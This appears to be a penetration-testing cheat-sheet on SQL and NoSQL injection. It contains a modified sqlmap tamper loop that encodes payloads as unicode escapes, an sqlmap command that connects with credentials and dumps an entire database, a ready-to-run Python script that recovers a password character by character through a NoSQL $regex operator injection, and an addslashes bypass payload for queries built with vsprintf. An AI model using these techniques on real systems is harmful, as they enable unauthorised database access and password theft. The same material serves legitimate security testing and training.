SQL Injection

SQLMap

Modify the unicode encoding loop in "/usr/share/sqlmap/tamper/charunicodeencode.py" as follows:
# Re-emit every character of the payload as a backslash-u escape.
# A percent-encoded byte (%XX, both digits hex) becomes \u00XX; any other
# character becomes \u followed by its code point as four upper-case hex digits.
# Assumes `i`, `retVal` and `payload` are already bound by the enclosing
# tamper() function, which is not shown here. This presumably replaces the
# stock tamper's %uXXXX output form -- confirm against the installed copy.
while i < len(payload):
    # `i < len(payload) - 2` guarantees two characters follow the '%'
    if payload[i] == '%' and (i < len(payload) - 2) and payload[i + 1:i + 2] in string.hexdigits and payload[i + 2:i + 3] in string.hexdigits:
        # keep the two hex digits of the %XX sequence, drop the '%'
        retVal += "\\u00%s" % payload[i + 1:i + 3]
        i += 3
    else:
        retVal += '\\u%.4X' % ord(payload[i])
        i += 1

Connect with Credentials

# -d: connect directly to the DBMS with the given connection string (no HTTP target);
# --dump dumps table entries (narrow the scope with -D/-T if needed).
# Note: the credentials end up in shell history and process listings.
sqlmap -d "mysql://<user>:<password>@<ip>/<database>" --dump

NoSQL

Retrieve password:
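#!/usr/bin/env python3
"""Recover a password one character at a time through a NoSQL ``$regex`` operator injection.

The login form is posted with ``password[$regex]`` set to ``^<known prefix><candidate>.*$``.
A 302 response is treated as "the prefix matches": the candidate is appended and the
search restarts. The loop ends when no candidate extends the prefix.

Set ``url`` to the login endpoint before running.

Server-side mitigation: reject operator-valued fields (keys such as ``$regex``) and
compare the password as a plain string, so a request parameter can never turn into
a query operator.
"""
import re
import requests
import string

# candidate alphabet: letters, digits and punctuation
chars = string.ascii_letters + string.digits + string.punctuation
password = ""
url = ""  # login endpoint, e.g. "http://<target>/login" (placeholder) -- fill in before running
done = False

while not done:
    done = True  # assume no character extends the prefix; a hit below resets this
    for c in chars:
        data = {
            "username": "",
            # anchor at the start so the match is prefix-based; re.escape keeps
            # punctuation candidates from being interpreted as regex syntax
            "password[$regex]": f"^{re.escape(password + c)}.*$",
            "login": "login",
        }
        # redirects are not followed so the 302 itself is observable
        r = requests.post(url, data=data, allow_redirects=False)
        if r.status_code == 302:  # redirect == accepted login == prefix + c matches
            done = False
            password += c
            print(f"[+] Found {c}")
print(f"[+] Password: {password}")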

PHP addslashes bypass using vsprintf

If the query is built with vsprintf, the input can be sent like this (replace * with your injection):
xxx%1$\%27)*